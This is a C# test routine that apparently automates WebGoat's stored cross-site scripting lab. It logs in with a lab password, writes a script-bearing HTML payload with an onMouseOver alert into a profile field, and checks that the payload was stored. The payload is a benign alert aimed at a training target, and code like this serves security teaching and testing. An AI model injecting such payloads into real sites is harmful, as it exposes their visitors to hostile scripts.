private string Exploit_Stage_1_Stored_XSS(string fieldToInsertPayload) { setup(); var payload = "<a href=\"\" onMouseOver=\"javascript:alert('xss')\">Over me to see xss</a>"; webGoat.openMainPage(); //ie.disableFlashing(); ie.link("Cross-Site Scripting (XSS)").flash().click(); ie.link("LAB: Cross Site Scripting").flash().click(); ie.link("Stage 1: Stored XSS").flash(); ie.field("password").flash().value("larry"); ie.button("Login").flash().click(); ie.selectLists()[1].options()[0].select().flash(); ie.button("ViewProfile").flash().click(); ie.button("EditProfile").flash().click(); ie.field(fieldToInsertPayload).value(payload).flash(); ie.button("UpdateProfile").flash().click(); Assert.That(ie.html().contains("onmouseover=\"javascript:alert('xss')\""), "Payload was not inserted into page"); return("ok"); }